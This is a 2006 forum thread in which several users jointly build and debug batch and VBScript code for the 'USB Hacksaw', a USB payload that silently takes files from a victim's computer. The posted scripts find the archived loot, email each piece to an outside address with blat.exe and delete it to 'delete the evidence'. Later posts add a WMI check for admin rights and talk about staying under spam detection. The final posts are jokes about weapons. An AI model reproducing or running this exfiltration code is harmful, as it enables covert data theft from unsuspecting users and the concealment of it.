SomeoneE1se Posted September 28, 2006 Posted September 28, 2006 IF EXIST pwned.rar GOTO 5end1 IF EXIST pwned.r00 GOTO 5end1 ELSE GOTO END :hak1 set /a part=%part%+1 IF %part% lss 10 goto less10 else goto more10 :less10 IF EXIST pwned.r0%part% goto sendless10 else goto end :more10 IF EXIST pwned.r%part% goto send else goto end :5end1 blat.exe pwned.rar -base64 -to [email protected] -u username -pw password -server 127.0.0.1:1099 del pwned.rar (delete the evidence after sending) goto hak1 :sendless10 blat.exe pwned.r0%part% -base64 -to [email protected] -u username -pw password -server 127.0.0.1:1099 del pwned.r%part% (delete the evidence after sending) goto hak1 :send blat.exe pwned.r%part% -base64 -to [email protected] -u username -pw password -server 127.0.0.1:1099 del pwned.r%part% (delete the evidence after sending) goto hak1 :end exit @ this point gmullens las small bit would prolly b better as its les line's of code .... (tho i dont kno the issue's ....) I think this bit of code will create an error becasue if the .rar does not exist when it sees the .r00 it will try to send *.rar and it not being there will gen the error.... spliting the send of .rar and the sending of .r00 should fix this I can't think right now I'm at work Quote
cooper Posted September 28, 2006 Posted September 28, 2006 Okay, keep in mind with this that I have no Windows machine to test this batch code against. There are most likely some errors in here, but you should get the general idea. SET NAMEPART=pwned. SET PARTNO=-1 :again SET FILENAME=%NAMEPART%rar IF EXISTS %FILENAME% Â Â Â Â GOTO transmit SET /a PARTNO=%PARTNO%+1 IF %PARTNO% lss 10 Â Â Â Â SET FILENAME=%NAMEPART%.r0%PARTNO% ELSE Â Â Â Â SET FILENAME=%NAMEPART%.r%PARTNO% IF EXISTS %FILENAME% Â Â Â Â GOTO transmit IF %PARTNO% lss 10 Â Â Â Â SET FILENAME=%NAMEPART%.00%PARTNO% ELSE IF %PARTNO% lss 100 Â Â Â Â SET FILENAME=%NAMEPART%.0%PARTNO% ELSE Â Â Â Â SET FILENAME=%NAMEPART%.%PARTNO% IF EXISTS %FILENAME% Â Â Â Â GOTO transmit GOTO end :transmit blat.exe %FILENAME% -base64 -to [email protected] -u username -pw password -server 127.0.0.1:1099 del %FILENAME% GOTO again :end In short, us a variable throughout the script that you fill with the file to send. Test for the .rar, the .r01 and the .001 variants of filenames, and ups the number as things progress. Not sure if "ELSE IF" is allowed, but if it is it should nicely deal with rars that come in more than 100 pieces. How's it look? Quote
pseudobreed Posted September 28, 2006 Posted September 28, 2006 That's why I wrote the vbscript to just grab files based on a filter. I did not know how the files were going to get split and as long as the argument has a wildcard, the filename should get put into the array. That, and I had no idea what happens if you split a file over 101 parts... The only problem I see is if the files that you want to send out begin the same as other files. However, this is an easy fix. Just name the data files something unique and include as much as you can as the argument with a * at the end. Quote
boristsr Posted September 29, 2006 Posted September 29, 2006 is it just me or has that batch script been written 3 times now? :P Quote
SomeoneE1se Posted September 29, 2006 Posted September 29, 2006 it's been fixed 3 times... however if we start to send more then about 20 e-mails someone is going to catch that if not flagged as a spamer and that being a quick way to get an IP killed so keeping it to less then 100 would be the best idea... when I get home i'll test coopers batch script and edit it if need be Quote
Darren Kitchen Posted September 29, 2006 Author Posted September 29, 2006 For Each FileName In arrFiles   'WScript.Echo FileName   blat.exe FileName -base64 -to [email protected] -u username -pw password -server 127.0.0.1:1099 Next on Not quite working S:>cscript send.vbs goodies* Microsoft (R) Windows Script Host Version 5.6 Copyright (C) Microsoft Corporation 1996-2001. All rights reserved. S:send.vbs(19, 30) Microsoft VBScript compilation error: Syntax error for me 19,30 is where it does the -to emailaddress Seems that "to" is a vbs command its its parsing it wrong. what's the escape character for vbs? Quote
Darren Kitchen Posted September 29, 2006 Author Posted September 29, 2006 finished the hack. thanks for all the help guys! Quote
pseudobreed Posted September 29, 2006 Posted September 29, 2006 That was my fault. Trying to pull off batch commands in vbscript. This works, and I actually tested it using blat instead of the echo command. Set FSO = CreateObject("Scripting.FileSystemObject") ReDim arrFiles(1) Set Folder = FSO.GetFolder(".") Set Files = Folder.Files For Each File in Files   If CheckFile(File.Name, WSCript.Arguments(0)) Then     If i > UBound(arrFiles) Then Redim Preserve arrFiles(i*2)     arrFiles(i) = File.Path     i = i + 1   End If Next ReDim Preserve arrFiles(i-1) Set WSHShell = Wscript.CreateObject("Wscript.Shell") For Each FileName In arrFiles   Send = "blat.exe " & FileName & " -base64 -to [email protected] -u username -pw password -server 127.0.0.1:1099"   'WScript.Echo Send   WSHShell.Run Send Next Private Function CheckFile (ByVal Name, ByVal Filter)   CheckFile = False   FilterPos = 1   NamePos = 1   Do     If FilterPos > Len(Filter) Then       CheckFile = NamePos > len(Name)       Exit Function     End If     If Mid(Filter,FilterPos) = ".*" Then       If NamePos > Len(Name) Then CheckFile = True       Exit Function     End If     If Mid(Filter,FilterPos) = "." Then       CheckFile = NamePos > Len(Name)       Exit Function     End If     FilterCount = Mid(Filter,FilterPos,1)     FilterPos = FilterPos + 1     Select Case FilterCount       Case "*"         CheckFile = CheckFile2(Name,NamePos,Filter,FilterPos)         Exit Function       Case "?"         If NamePos <= Len(Name) And Mid(Name,NamePos,1) <> "." Then NamePos = NamePos + 1       Case Else         If NamePos > Len(Name) Then Exit Function         NameCount = Mid(Name,NamePos,1)         NamePos = NamePos + 1         If Strcomp(FilterCount,NameCount,vbTextCompare) <> 0 Then Exit Function     End Select   Loop End Function Private Function CheckFile2 (ByVal Name, ByVal NamePos0, ByVal Filter, ByVal FilterPos0)   FilterPos = FilterPos0   Do     If FilterPos > Len(Filter) Then       CheckFile2 = True       Exit Function     End If     FilterCount2 = Mid(Filter,FilterPos,1)     FilterPos = FilterPos + 1            If FilterCount2 <> "*" And FilterCount2 <> "?" Then       Exit Do     End If   Loop   If FilterCount2 = "." Then     If Mid(Filter,FilterPos) = "*" Then       CheckFile2 = True       Exit Function     End If         If FilterPos > Len(Filter) Then       CheckFile2 = InStr(NamePos0,Name,".") = 0       Exit Function     End If   End If   For NamePos = NamePos0 To Len(Name)     NameCount = Mid(Name,NamePos,1)     If StrComp(FilterCount2,NameCount,vbTextCompare)=0 Then       If CheckFile(Mid(Name,NamePos+1),Mid(Filter,FilterPos)) Then         CheckFile2 = True         Exit Function       End If     End If   Next     CheckFile2 = False End Function Just change the credentials for blat and everything should be ok. Quote
Darren Kitchen Posted September 29, 2006 Author Posted September 29, 2006 I'll try it this afternoon. I was able to get this hack, the USB Hacksaw, working on a guest account so thats pretty exciting stuff. Unfortunately the IFMEMBER command doesnt work so I've got a lot of redundancy in my script which could be cleaned up if I knew if the logged in user was guest or power user/admin. then again maybe creating a directory in %systemroot% and checking the errorlevel would help determine that since guests cant do that. ahh, POC code.... you know how it goes. just enough to make it work. Quote
pseudobreed Posted September 29, 2006 Posted September 29, 2006 The first thing that came to mind was to use the WMI. The following code will query the NetworkLoginProfile, check privileges of the current logged in user. If the privilege is equal to 2, then user account has admin rights and you can add the rest of the code there. Copy and paste code into a .vbs file. szComputer = "." Set objShell = WScript.CreateObject("WScript.Shell") Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!" & szComputer & "rootcimv2") Set colItems = objWMIService.ExecQuery ("Select * from Win32_NetworkLoginProfile") For Each objItem in colItems   If objItem.Caption = objShell.ExpandEnvironmentStrings("%username%") Then     If objItem.Privileges = 2 Then       ' 0 - Guest       ' 1 - User       ' 2 - Administrator       ' <INSERT REST OF CODE HERE>     End If   End If Next Quote
DLSS Posted September 29, 2006 Posted September 29, 2006 boy , i never thought working on code could be this much fun :D especially wit everybody working together :D *arg why isn't there a hugging emoticon ?* Quote
pseudobreed Posted September 29, 2006 Posted September 29, 2006 If the original was called the Switchblade, why is Darren calling the next version the USB Hacksaw? A scarey thought. Quote
SomeoneE1se Posted September 29, 2006 Posted September 29, 2006 Think about it.. a switchblade can be hidden very well and that was the idea of it never let them know they got owned.. but now with the haksaw it's a bit more brutal.... think of it this way... with a switchblade you have to stab them more then a few times to kill them... but with a haksaw you can just cut there head off... thats a lot easyer way to kill someone ;) Quote
VaKo Posted September 29, 2006 Posted September 29, 2006 Going on practicalitys, I wouldn't bring a hacksaw to a knife fight... Quote
SomeoneE1se Posted September 29, 2006 Posted September 29, 2006 when is comes right down to it.. in any kinda fight I'd use martial arts.. the best martial arts for a knife fight Shotgon Do... but then thats no match for Run Foo and if you happen to be in the US theres always I Su Yoo Quote
PoyBoy Posted September 29, 2006 Posted September 29, 2006 Id bring a bereeta Xtrema 2 to a knife fight Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.